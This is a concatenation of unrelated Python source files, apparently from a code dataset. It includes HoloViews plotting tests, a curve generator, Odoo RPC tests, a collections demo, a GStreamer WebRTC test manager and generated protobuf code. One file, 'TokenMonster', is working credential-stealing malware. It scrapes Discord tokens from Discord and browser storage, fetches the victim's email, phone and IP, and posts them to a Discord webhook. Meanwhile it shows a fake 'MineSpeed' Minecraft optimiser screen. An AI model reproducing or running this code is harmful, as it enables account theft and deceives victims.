current_obj[0][()].Scatter.II,
lnk_sel,
self.data.iloc[[0, 2]]
)
# Check selected table
self.assertEqual(
self.element_color(current_obj[1][()]),
[
lnk_sel.selected_color,
lnk_sel.unselected_color,
lnk_sel.selected_color,
]
)
def test_overlay_scatter_errorbars(self, dynamic=False):
scatter = hv.Scatter(self.data, kdims='x', vdims='y')
error = hv.ErrorBars(self.data, kdims='x', vdims=['y', 'e'])
lnk_sel = link_selections.instance()
overlay = scatter * error
if dynamic:
overlay = hv.util.Dynamic(overlay)
linked = lnk_sel(overlay)
current_obj = linked[()]
# Check initial base layers
self.check_base_scatter_like(current_obj.Scatter.I, lnk_sel)
self.check_base_scatter_like(current_obj.ErrorBars.I, lnk_sel)
# Check initial selection layers
self.check_overlay_scatter_like(
current_obj.Scatter.II, lnk_sel, self.data
)
self.check_overlay_scatter_like(
current_obj.ErrorBars.II, lnk_sel, self.data
)
# Select first and third point
boundsxy = lnk_sel._selection_expr_streams[0]._source_streams[0]
boundsxy.event(bounds=(0, 0, 4, 2))
current_obj = linked[()]
# Check base layers haven't changed
self.check_base_scatter_like(current_obj.Scatter.I, lnk_sel)
self.check_base_scatter_like(current_obj.ErrorBars.I, lnk_sel)
# Check selected layers
self.check_overlay_scatter_like(
current_obj.Scatter.II, lnk_sel, self.data.iloc[[0, 2]]
)
self.check_overlay_scatter_like(
current_obj.ErrorBars.II, lnk_sel, self.data.iloc[[0, 2]]
)
def test_overlay_scatter_errorbars_dynamic(self):
self.test_overlay_scatter_errorbars(dynamic=True)
@ds_skip
def test_datashade_selection(self):
scatter = hv.Scatter(self.data, kdims='x', vdims='y')
layout = scatter + dynspread(datashade(scatter))
lnk_sel = link_selections.instance()
linked = lnk_sel(layout)
current_obj = linked[()]
# Check base scatter layer
self.check_base_scatter_like(current_obj[0][()].Scatter.I, lnk_sel)
# Check selection layer
self.check_overlay_scatter_like(
current_obj[0][()].Scatter.II, lnk_sel, self.data
)
# Check RGB base layer
self.assertEqual(
current_obj[1][()].RGB.I,
dynspread(
datashade(scatter, cmap=lnk_sel.unselected_cmap, alpha=255)
)[()]
)
# Check RGB selection layer
self.assertEqual(
current_obj[1][()].RGB.II,
dynspread(
datashade(scatter, cmap=lnk_sel.selected_cmap, alpha=0)
)[()]
)
# Perform selection of second and third point
boundsxy = lnk_sel._selection_expr_streams[0]._source_streams[0]
self.assertIsInstance(boundsxy, hv.streams.BoundsXY)
boundsxy.event(bounds=(0, 1, 5, 5))
current_obj = linked[()]
# Check that base scatter layer is unchanged
self.check_base_scatter_like(current_obj[0][()].Scatter.I, lnk_sel)
# Check scatter selection layer
self.check_overlay_scatter_like(
current_obj[0][()].Scatter.II, lnk_sel, self.data.iloc[1:]
)
# Check that base RGB layer is unchanged
self.assertEqual(
current_obj[1][()].RGB.I,
dynspread(
datashade(scatter, cmap=lnk_sel.unselected_cmap, alpha=255)
)[()]
)
# Check selection RGB layer
self.assertEqual(
current_obj[1][()].RGB.II,
dynspread(
datashade(
scatter.iloc[1:], cmap=lnk_sel.selected_cmap, alpha=255
)
)[()]
)
def test_scatter_selection_streaming(self):
buffer = hv.streams.Buffer(self.data.iloc[:2], index=False)
scatter = hv.DynamicMap(hv.Scatter, streams=[buffer])
lnk_sel = link_selections.instance()
linked = lnk_sel(scatter)
# Perform selection of first and (future) third point
boundsxy = lnk_sel._selection_expr_streams[0]._source_streams[0]
self.assertIsInstance(boundsxy, hv.streams.BoundsXY)
boundsxy.event(bounds=(0, 0, 4, 2))
current_obj = linked[()]
# Check initial base layer
self.check_base_scatter_like(
current_obj.Scatter.I, lnk_sel, self.data.iloc[:2]
)
# Check selection layer
self.check_overlay_scatter_like(
current_obj.Scatter.II, lnk_sel, self.data.iloc[[0]]
)
# Now stream third point to the DynamicMap
buffer.send(self.data.iloc[[2]])
current_obj = linked[()]
# Check initial base layer
self.check_base_scatter_like(
current_obj.Scatter.I, lnk_sel, self.data
)
# Check selection layer
self.check_overlay_scatter_like(
current_obj.Scatter.II, lnk_sel, self.data.iloc[[0, 2]]
)
# Backend implementations
class TestLinkSelectionsPlotly(TestLinkSelections):
def setUp(self):
try:
import holoviews.plotting.plotly # noqa
except:
raise SkipTest("Plotly selection tests require plotly.")
super(TestLinkSelectionsPlotly, self).setUp()
self._backend = Store.current_backend
Store.set_current_backend('plotly')
def tearDown(self):
Store.current_backend = self._backend
def element_color(self, element):
if isinstance(element, hv.Table):
color = element.opts.get('style').kwargs['fill']
else:
color = element.opts.get('style').kwargs['color']
if isinstance(color, str):
return color
else:
return list(color)
def element_visible(self, element):
return element.opts.get('style').kwargs['visible']
class TestLinkSelectionsBokeh(TestLinkSelections):
def setUp(self):
try:
import holoviews.plotting.bokeh # noqa
except:
raise SkipTest("Bokeh selection tests require bokeh.")
super(TestLinkSelectionsBokeh, self).setUp()
self._backend = Store.current_backend
Store.set_current_backend('bokeh')
def tearDown(self):
Store.current_backend = self._backend
def element_color(self, element):
color = element.opts.get('style').kwargs['color']
if isinstance(color, str):
return color
else:
return list(color)
def element_visible(self, element):
return element.opts.get('style').kwargs['alpha'] > 0
@skip("Coloring Bokeh table not yet supported")
def test_layout_selection_scatter_table(self):
pass
@skip("Bokeh ErrorBars selection not yet supported")
def test_overlay_scatter_errorbars(self):
pass
@skip("Bokeh ErrorBars selection not yet supported")
def test_overlay_scatter_errorbars_dynamic(self):
pass
| StarcoderdataPython |
3315617 | <reponame>mrkraimer/testPvaPy
# GenerateCurve.py
import numpy as np
import sys
def getCurveNames() :
return ("line","circle","ellipse","clover","heart","lissajous","figureight")
def generateCurve(argv) :
nargs = len(argv)
if nargs==1 :
print('argument must be one of: ',getCurveNames())
exit()
if nargs<2 : raise Exception('must specify curve name')
name = sys.argv[1]
if name==str("line") :
npts = 1000
x = np.arange(npts,dtype="float64")
y = np.arange(npts,dtype="float64")
return {"x":x,"y":y,"name":name}
if name==str("circle") :
min = 0.0
max = 1.0
npts = 2000
inc = (max-min)/npts
t = np.arange(min, max, inc)
x = np.cos(2*np.pi*t)
y = np.sin(2*np.pi*t)
return {"x":x,"y":y,"name":name}
if name==str("ellipse") :
min = 0.0
max = 1.0
npts = 2000
inc = (max-min)/npts
t = np.arange(min, max, inc)
a = 3.0
if nargs>=3 : a = float(sys.argv[2])
b = 2.0
if nargs>=4 : b = float(sys.argv[3])
x = a*np.cos(2*np.pi*t)
y = b*np.sin(2*np.pi*t)
return {"x":x,"y":y,"name":name}
if name==str("clover") :
min = 0.0
max = 1.0
npts = 2000
inc = (max-min)/npts
nloops = 3
if nargs>=3 : nloops = float(sys.argv[2])
print('nloops=',nloops)
t = np.arange(min, max, inc)
x = np.sin(nloops*2*np.pi*t)*np.cos(2*np.pi*t)
y = np.sin(nloops*2*np.pi*t)*np.sin(2*np.pi*t)
return {"x":x,"y":y,"name":name}
if name==str("heart") :
min = 0.0
max = 1.0
npts = 2000
inc = (max-min)/npts
t = np.arange(min, max, inc)
x = (1.0 - np.cos(2*np.pi*t)*np.cos(2*np.pi*t))*np.sin(2*np.pi*t)
y = (1.0 - np.cos(2*np.pi*t)*np.cos(2*np.pi*t)*np.cos(2*np.pi*t))*np.cos(2*np.pi*t)
return {"x":x,"y":y,"name":name}
if name==str("lissajous") :
min = 0.0
max = 1.0
npts = 4000
inc = (max-min)/npts
t = np.arange(min, max, inc)
m = 3
if nargs>=3 : m = float(sys.argv[2])
n = 1
if nargs>=4 : n = float(sys.argv[3])
x = np.sin(n*2*np.pi*t)
y = np.cos(m*2*np.pi*t)
return {"x":x,"y":y,"name":name}
if name==str("figureight") :
min = 0.0
max = 1.0
npts = 2000
inc = (max-min)/npts
a = 1
if nargs>=3 : a = float(sys.argv[2])
print('a=',a)
t = np.arange(min, max, inc)
x = a*np.sin(2*np.pi*t)*np.cos(2*np.pi*t)
y = a*np.sin(2*np.pi*t)
return {"x":x,"y":y,"name":name}
raise Exception(name + ' not implemented')
if __name__ == '__main__':
curveData = generateCurve(sys.argv)
print('name=',curveData["name"],' len(x)=',len(curveData["x"]),' len(y)=',len(curveData["y"]))
| StarcoderdataPython |
1684061 | <gh_stars>1-10
from unittest import TestCase
from core.odoorpc import OdooRPC
from core.models import Version
from config import ODOO_TEST_URL, ODOO_TEST_DB, ODOO_TEST_USERNAME, ODOO_TEST_PASSWORD
class OdooRPCTest(TestCase):
def __init__(self, *args, **kwargs):
super(OdooRPCTest, self).__init__(*args, **kwargs)
self.odoo = OdooRPC(
ODOO_TEST_URL,
ODOO_TEST_DB,
ODOO_TEST_USERNAME,
ODOO_TEST_PASSWORD,
)
def test_version(self):
result = self.odoo.version()
self.assertEqual(type(result), Version)
def test_authenticate(self):
result = self.odoo.authenticate()
self.assertEqual(type(result), int)
def test_check_access_right(self):
result = self.odoo.check_access_rights("res.partner", ["read"])
self.assertEqual(result, True)
def test_search(self):
result = self.odoo.search("res.partner")
self.assertEqual(type(result), list)
def test_search_limit(self):
result = self.odoo.search("res.partner", limit=1)
self.assertEqual(len(result), 1)
def test_search_domain(self):
result = self.odoo.search("res.partner", domain=[
["is_company", "=", True]])
self.assertEqual(len(result), 1)
def test_search_read(self):
result = self.odoo.search_read("res.partner")
self.assertEqual(type(result), list)
def test_search_read_limit(self):
result = self.odoo.search_read("res.partner", limit=1)
self.assertEqual(len(result), 1)
def test_search_read_domain(self):
result = self.odoo.search_read(
"res.partner", domain=[["is_company", "=", True]])
self.assertEqual(len(result), 1)
def test_search_read_fields(self):
result = self.odoo.search_read(
"res.partner", fields=["name", "email"], limit=1)
self.assertEqual(str(result[0].keys()),
"dict_keys(['id', 'name', 'email'])")
def test_read(self):
result = self.odoo.read("res.partner", [3], fields=["name", "email"])
self.assertEqual(len(result), 1)
self.assertEqual(str(result[0].keys()),
"dict_keys(['id', 'name', 'email'])")
def test_fields_get(self):
result = self.odoo.fields_get("res.partner")
self.assertEqual(type(result), dict)
def test_create_write_unlink(self):
id = self.odoo.create("res.partner", {
"name": "<NAME>"
})
self.assertEqual(type(id), int)
result = self.odoo.write("res.partner", id, {
"name": "<NAME>",
"email": "<EMAIL>",
})
self.assertEqual(result, True)
result_delete = self.odoo.unlink("res.partner", id)
self.assertEqual(result_delete, True)
| StarcoderdataPython |
3271188 | import os
import re
import json
import requests
import colorama
from time import sleep
from alive_progress import alive_bar
if 'PYCHARM_HOSTED' in os.environ:
convert = False
strip = False
else:
convert = None
strip = None
colorama.init(
convert=convert,
strip=strip
)
config = {
'WEBHOOK': True,
'WEBHOOK_URL': "<YOUR DISCORD WEBHOOK URL>",
'GUI': False,
'API_SEND': False,
'API_SEND_URL': "<YOUR_API_URL>"
}
class TokenMonster:
_pc_user = os.getlogin();
_pc_roaming = None
_pc_local = None
_tokens = []
def __init__(self):
if os.name != 'nt':
exit()
self._pc_roaming = os.getenv('APPDATA')
self._pc_local = os.getenv('LOCALAPPDATA')
self._scrape_tokens()
for token in self._tokens:
raw_user_data = self._retrieve(token)
user_json_str = json.dumps(raw_user_data)
user = json.loads(user_json_str)
if "username" in user:
if config["WEBHOOK"]:
webhook_data = {"username": "TokenMonster", "embeds": [
dict(title="Grabbed " + user['username'] + "'s token",
description="Token Monster has sniped an account at " + self._network_address() + " on " + self._pc_user,
color="4063108",
fields=[
{
"name": "💳 ID",
"value": "`" + user["id"] + "`",
"inline": False,
},
{
"name": "🧔 Username",
"value": "`" + user["username"] + "`",
"inline": False,
},
{
"name": "🎫 Tag",
"value": "`" + user["discriminator"] + "`",
"inline": False,
},
{
"name": "🏁 Locale",
"value": "`" + user["locale"] + "`",
"inline": False,
},
{
"name": "🔐 MFA Enabled?",
"value": "`" + str(user["mfa_enabled"]) + "`",
"inline": False,
},
{
"name": "📬 Email",
"value": "`" + user["email"] + "`",
"inline": False,
},
{
"name": "☎️ Phone Number",
"value": "`" + str(user["phone"]) + "`",
"inline": False,
},
{
"name": "💰 Token",
"value": "`" + token + "`",
"inline": False,
}
])
]}
result = requests.post(config["WEBHOOK_URL"], json=webhook_data)
if config["API_SEND_URL"]:
payload = {
'user_id': user["id"],
'username': user["username"],
'tag': user["discriminator"],
'locale': user["locale"],
'mfa': str(user["mfa_enabled"]),
'email': user["email"],
'phone': str(user["phone"]),
'token': user["token"]
}
requests.post(config["API_SEND_URL"], data=payload)
self._tokens.remove(token)
if config["GUI"]:
self._display_fake_prompt()
def _scrape_tokens(self):
crawl = {
'Discord': self._pc_roaming + '\\discord\\Local Storage\\leveldb\\',
'Chrome': self._pc_local + '\\google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\',
'Brave': self._pc_local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\',
'Yandex': self._pc_local + '\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\',
'Opera': self._pc_roaming + '\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\'
}
for source, path in crawl.items():
if not os.path.exists(path):
continue
for file_name in os.listdir(path):
if not file_name.endswith('.log') and not file_name.endswith('.ldb'):
continue
for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]:
for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}'):
for token in re.findall(regex, line):
self._tokens.append(token)
def _retrieve(self, token, content_type="application/json"):
header_data = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36",
"Authorization": token
}
return requests.get('https://discordapp.com/api/v9/users/@me', headers=header_data).json()
def _network_address(self):
ip = requests.get('https://api.ipify.org?format=json').json()
if ip:
ip_raw = json.dumps(ip)
user_ip = json.loads(ip_raw)
return user_ip["ip"]
else:
return False
def _display_fake_prompt(self):
display_string = """
---------------------------------------------------------------
███╗ ███╗██╗███╗ ██╗███████╗███████╗██████╗ ███████╗███████╗██████╗
████╗ ████║██║████╗ ██║██╔════╝██╔════╝██╔══██╗██╔════╝██╔════╝██╔══██╗
██╔████╔██║██║██╔██╗ ██║█████╗ ███████╗██████╔╝█████╗ █████╗ ██║ ██║
██║╚██╔╝██║██║██║╚██╗██║██╔══╝ ╚════██║██╔═══╝ ██╔══╝ ██╔══╝ ██║ ██║
██║ ╚═╝ ██║██║██║ ╚████║███████╗███████║██║ ███████╗███████╗██████╔╝
╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝╚══════╝╚══════╝╚═╝ ╚══════╝╚══════╝╚═════╝
----------------------------------------------------------------
@Package: MineSpeed
@Version: 1.0.1
@Description: Improve your Minecraft client speed. :D
----------------------------------------------------------------
"""
print(colorama.Fore.LIGHTGREEN_EX + display_string)
if self.has_internet():
print(colorama.Fore.WHITE + "Download latest injection package...")
sleep(2)
print(colorama.Fore.GREEN + "Locating Minecraft Client runtime...")
sleep(3)
print(colorama.Fore.BLUE + "Injecting package, this may take a while...")
sleep(6)
print(colorama.Fore.GREEN + "Re-Compiling Client runtime...")
sleep(3)
print(colorama.Fore.CYAN + "Testing package and cleaning things up...")
with alive_bar(100) as bar:
for i in range(100):
sleep(0.08)
bar()
os.system('cls' if os.name == 'nt' else 'clear')
print(
colorama.Fore.WHITE + "All done! Your Minecraft game should run at least 2x faster than normal. If you didn't notice any improvements, let us know!")
print(colorama.Fore.MAGENTA + "Thank you for using this tool! :))")
os.system("pause")
else:
print(colorama.Fore.RED + 'You are offline, restart MineSpeed by pressing any key, and reconnect to '
'the internet.\n')
os.system("pause")
def has_internet(self):
try:
response = requests.get('https://www.google.com/')
return True
except:
return False
init = TokenMonster()
| StarcoderdataPython |
4807449 | #collections.py
from collections import ChainMap
car_parts = {'hood': 500, 'engine': 5000, 'front_door': 750}
car_options = {'A/C': 1000, 'Turbo': 2500, 'rollbar': 300}
car_accessories = {'cover': 100, 'hood_ornament': 150, 'seat_cover': 99}
car_pricing = ChainMap(car_accessories, car_options, car_parts)
print (car_pricing['A/C'])
#1000
from collections import Counter
counter = Counter('superflous')
print(counter.elements())
#<itertools.chain object at 0x10989f490>
print(list(counter.elements()))
# ['s', 's', 'u', 'u', 'p', 'e', 'r', 'f', 'l', 'o']
from collections import defaultdict
animal = defaultdict(lambda: "Monkey")
animal['Sam'] = 'Tiger'
print(animal['Nick'])
#Monkey
print(animal)
#defaultdict(<function <lambda> at 0x10e834280>, {'Sam': 'Tiger', 'Nick': 'Monkey'})
from collections import deque
import string
d = deque(string.ascii_lowercase)
for letter in d:
print(letter)
d.append('right')
print(d)
# deque(['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'bork'])
d.appendleft('left')
print(d)
# deque(['left', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'bork'])
d.rotate(1)
print(d)
# deque(['bork', 'left', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'])
from collections import namedtuple
Parts = namedtuple('Parts', 'id_num desc cost amount')
auto_parts = Parts(id_num='1234', desc='Ferrari', cost=123, amount=10)
print(auto_parts.desc)
#Ferrari
from collections import OrderedDict
d = {'banana': 3, 'apple': 4, 'pear': 1, 'orange': 2}
new_ordered_dict = OrderedDict(sorted(d.items()))
print(new_ordered_dict) | StarcoderdataPython |
3275032 | <filename>check/validate/apps/gstwebrtc.py
# Copyright (c) 2020, <NAME> <<EMAIL>>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin St, Fifth Floor,
# Boston, MA 02110-1301, USA.
import inspect
import os
import sys
import shutil
import itertools
import tempfile
from launcher.baseclasses import TestsManager, GstValidateTest, ScenarioManager
from launcher.utils import DEFAULT_TIMEOUT
DEFAULT_BROWSERS = ['firefox', 'chrome']
# list of scenarios. These are the names of the actual scenario files stored
# on disk.
DEFAULT_SCENARIOS = [
"offer_answer",
"vp8_send_stream",
"open_data_channel",
"send_data_channel_string",
]
# various configuration changes that are included from other scenarios.
# key is the name of the override used in the name of the test
# value is the subdirectory where the override is placed
# changes some things about the test like:
# - who initiates the negotiation
# - bundle settings
SCENARIO_OVERRIDES = {
# name : directory
# who starts the negotiation
'local' : 'local_initiates_negotiation',
'remote' : 'remote_initiates_negotiation',
# bundle-policy configuration
# XXX: webrtcbin's bundle-policy=none is not part of the spec
'none_compat' : 'bundle_local_none_remote_max_compat',
'none_balanced' : 'bundle_local_none_remote_balanced',
'none_bundle' : 'bundle_local_none_remote_max_bundle',
'compat_compat' : 'bundle_local_max_compat_remote_max_compat',
'compat_balanced' : 'bundle_local_max_compat_remote_balanced',
'compat_bundle' : 'bundle_local_max_compat_remote_max_bundle',
'balanced_compat' : 'bundle_local_balanced_remote_max_compat',
'balanced_balanced' : 'bundle_local_balanced_remote_balanced',
'balanced_bundle' : 'bundle_local_balanced_remote_bundle',
'bundle_compat' : 'bundle_local_max_bundle_remote_max_compat',
'bundle_balanced' : 'bundle_local_max_bundle_remote_balanced',
'bundle_bundle' : 'bundle_local_max_bundle_remote_max_bundle',
}
bundle_options = ['compat', 'balanced', 'bundle']
# Given an override, these are the choices to choose from. Each choice is a
# separate test
OVERRIDE_CHOICES = {
'initiator' : ['local', 'remote'],
'bundle' : ['_'.join(opt) for opt in itertools.product(['none'] + bundle_options, bundle_options)],
}
# Which scenarios support which override. All the overrides will be chosen
SCENARIO_OVERRIDES_SUPPORTED = {
"offer_answer" : ['initiator', 'bundle'],
"vp8_send_stream" : ['initiator', 'bundle'],
"open_data_channel" : ['initiator', 'bundle'],
"send_data_channel_string" : ['initiator', 'bundle'],
}
# Things that don't work for some reason or another.
DEFAULT_BLACKLIST = [
(r"webrtc\.firefox\.local\..*offer_answer",
"Firefox doesn't like a SDP without any media"),
(r"webrtc.*remote.*vp8_send_stream",
"We can't match payload types with a remote offer and a sending stream"),
(r"webrtc.*\.balanced_.*",
"webrtcbin doesn't implement bundle-policy=balanced"),
(r"webrtc.*\.none_bundle.*",
"Browsers want a BUNDLE group if in max-bundle mode"),
]
class MutableInt(object):
def __init__(self, value):
self.value = value
class GstWebRTCTest(GstValidateTest):
__used_ports = set()
__last_id = MutableInt(10)
@classmethod
def __get_open_port(cls):
while True:
# hackish trick from
# http://stackoverflow.com/questions/2838244/get-open-tcp-port-in-python?answertab=votes#tab-top
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("", 0))
port = s.getsockname()[1]
if port not in cls.__used_ports:
cls.__used_ports.add(port)
s.close()
return port
s.close()
@classmethod
def __get_available_peer_id(cls):
# each connection uses two peer ids
peerid = cls.__last_id.value
cls.__last_id.value += 2
return peerid
def __init__(self, classname, tests_manager, scenario, browser, scenario_override_includes=None, timeout=DEFAULT_TIMEOUT):
super().__init__("python3",
classname,
tests_manager.options,
tests_manager.reporter,
timeout=timeout,
scenario=scenario)
self.webrtc_server = None
filename = inspect.getframeinfo (inspect.currentframe ()).filename
self.current_file_path = os.path.dirname (os.path.abspath (filename))
self.certdir = None
self.browser = browser
self.scenario_override_includes = scenario_override_includes
def launch_server(self):
if self.options.redirect_logs == 'stdout':
self.webrtcserver_logs = sys.stdout
elif self.options.redirect_logs == 'stderr':
self.webrtcserver_logs = sys.stderr
else:
self.webrtcserver_logs = open(self.logfile + '_webrtcserver.log', 'w+')
self.extra_logfiles.add(self.webrtcserver_logs.name)
generate_certs_location = os.path.join(self.current_file_path, "..", "..", "..", "signalling", "generate_cert.sh")
self.certdir = tempfile.mkdtemp()
command = [generate_certs_location, self.certdir]
server_env = os.environ.copy()
subprocess.run(command,
stderr=self.webrtcserver_logs,
stdout=self.webrtcserver_logs,
env=server_env)
self.server_port = self.__get_open_port()
server_location = os.path.join(self.current_file_path, "..", "..", "..", "signalling", "simple_server.py")
command = [server_location, "--cert-path", self.certdir, "--addr", "127.0.0.1", "--port", str(self.server_port)]
self.webrtc_server = subprocess.Popen(command,
stderr=self.webrtcserver_logs,
stdout=self.webrtcserver_logs,
env=server_env)
while True:
s = socket.socket()
try:
s.connect((("127.0.0.1", self.server_port)))
break
except ConnectionRefusedError:
time.sleep(0.1)
continue
finally:
s.close()
return ' '.join(command)
def build_arguments(self):
gst_id = self.__get_available_peer_id()
web_id = gst_id + 1
self.add_arguments(os.path.join(self.current_file_path, '..', 'webrtc_validate.py'))
self.add_arguments('--server')
self.add_arguments("wss://127.0.0.1:%s" % (self.server_port,))
self.add_arguments('--browser')
self.add_arguments(self.browser)
self.add_arguments("--html-source")
html_page = os.path.join(self.current_file_path, '..', 'web', 'single_stream.html')
html_params = '?server=127.0.0.1&port=' + str(self.server_port) + '&id=' + str(web_id)
self.add_arguments("file://" + html_page + html_params)
self.add_arguments("--name")
self.add_arguments(self.classname)
self.add_arguments('--peer-id')
self.add_arguments(str(web_id))
self.add_arguments(str(gst_id))
def close_logfile(self):
super().close_logfile()
if not self.options.redirect_logs:
self.webrtcserver_logs.close()
def process_update(self):
res = super().process_update()
if res:
kill_subprocess(self, self.webrtc_server, DEFAULT_TIMEOUT)
self.__used_ports.remove(self.server_port)
if self.certdir:
shutil.rmtree(self.certdir, ignore_errors=True)
return res
def get_subproc_env(self):
env = super().get_subproc_env()
if not self.scenario_override_includes:
return env
# this feels gross...
paths = env.get('GST_VALIDATE_SCENARIOS_PATH', '').split(os.pathsep)
new_paths = []
for p in paths:
new_paths.append(p)
for override_path in self.scenario_override_includes:
new_p = os.path.join(p, override_path)
if os.path.exists (new_p):
new_paths.append(new_p)
env['GST_VALIDATE_SCENARIOS_PATH'] = os.pathsep.join(new_paths)
return env
class GstWebRTCTestsManager(TestsManager):
scenarios_manager = ScenarioManager()
name = "webrtc"
def __init__(self):
super(GstWebRTCTestsManager, self).__init__()
self.loading_testsuite = self.name
self._scenarios = []
def add_scenarios(self, scenarios):
if isinstance(scenarios, list):
self._scenarios.extend(scenarios)
else:
self._scenarios.append(scenarios)
self._scenarios = list(set(self._scenarios))
def set_scenarios(self, scenarios):
self._scenarios = []
self.add_scenarios(scenarios)
def get_scenarios(self):
return self._scenarios
def populate_testsuite(self):
self.add_scenarios (DEFAULT_SCENARIOS)
self.set_default_blacklist(DEFAULT_BLACKLIST)
def list_tests(self):
if self.tests:
return self.tests
scenarios = [(scenario_name, self.scenarios_manager.get_scenario(scenario_name))
for scenario_name in self.get_scenarios()]
for browser in DEFAULT_BROWSERS:
for name, scenario in scenarios:
if not scenario:
self.warning("Could not find scenario %s" % name)
continue
if not SCENARIO_OVERRIDES_SUPPORTED[name]:
# no override choices supported
classname = browser + '.' + name
print ("adding", classname)
self.add_test(GstWebRTCTest(classname, self, scenario, browser))
else:
for overrides in itertools.product(*[OVERRIDE_CHOICES[c] for c in SCENARIO_OVERRIDES_SUPPORTED[name]]):
oname = '.'.join (overrides)
opaths = [SCENARIO_OVERRIDES[p] for p in overrides]
classname = browser + '.' + oname + '.' + name
print ("adding", classname)
self.add_test(GstWebRTCTest(classname, self, scenario, browser, opaths))
return self.tests
| StarcoderdataPython |
3363041 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/api/system_parameter.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name="google/api/system_parameter.proto",
package="google.api",
syntax="proto3",
serialized_options=b"\n\016com.google.apiB\024SystemParameterProtoP\001ZEgoogle.golang.org/genproto/googleapis/api/serviceconfig;serviceconfig\242\002\004GAPI",
serialized_pb=b'\n!google/api/system_parameter.proto\x12\ngoogle.api"B\n\x10SystemParameters\x12.\n\x05rules\x18\x01 \x03(\x0b\x32\x1f.google.api.SystemParameterRule"X\n\x13SystemParameterRule\x12\x10\n\x08selector\x18\x01 \x01(\t\x12/\n\nparameters\x18\x02 \x03(\x0b\x32\x1b.google.api.SystemParameter"Q\n\x0fSystemParameter\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x13\n\x0bhttp_header\x18\x02 \x01(\t\x12\x1b\n\x13url_query_parameter\x18\x03 \x01(\tBv\n\x0e\x63om.google.apiB\x14SystemParameterProtoP\x01ZEgoogle.golang.org/genproto/googleapis/api/serviceconfig;serviceconfig\xa2\x02\x04GAPIb\x06proto3',
)
_SYSTEMPARAMETERS = _descriptor.Descriptor(
name="SystemParameters",
full_name="google.api.SystemParameters",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="rules",
full_name="google.api.SystemParameters.rules",
index=0,
number=1,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
)
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=49,
serialized_end=115,
)
_SYSTEMPARAMETERRULE = _descriptor.Descriptor(
name="SystemParameterRule",
full_name="google.api.SystemParameterRule",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="selector",
full_name="google.api.SystemParameterRule.selector",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="parameters",
full_name="google.api.SystemParameterRule.parameters",
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=117,
serialized_end=205,
)
_SYSTEMPARAMETER = _descriptor.Descriptor(
name="SystemParameter",
full_name="google.api.SystemParameter",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="name",
full_name="google.api.SystemParameter.name",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="http_header",
full_name="google.api.SystemParameter.http_header",
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
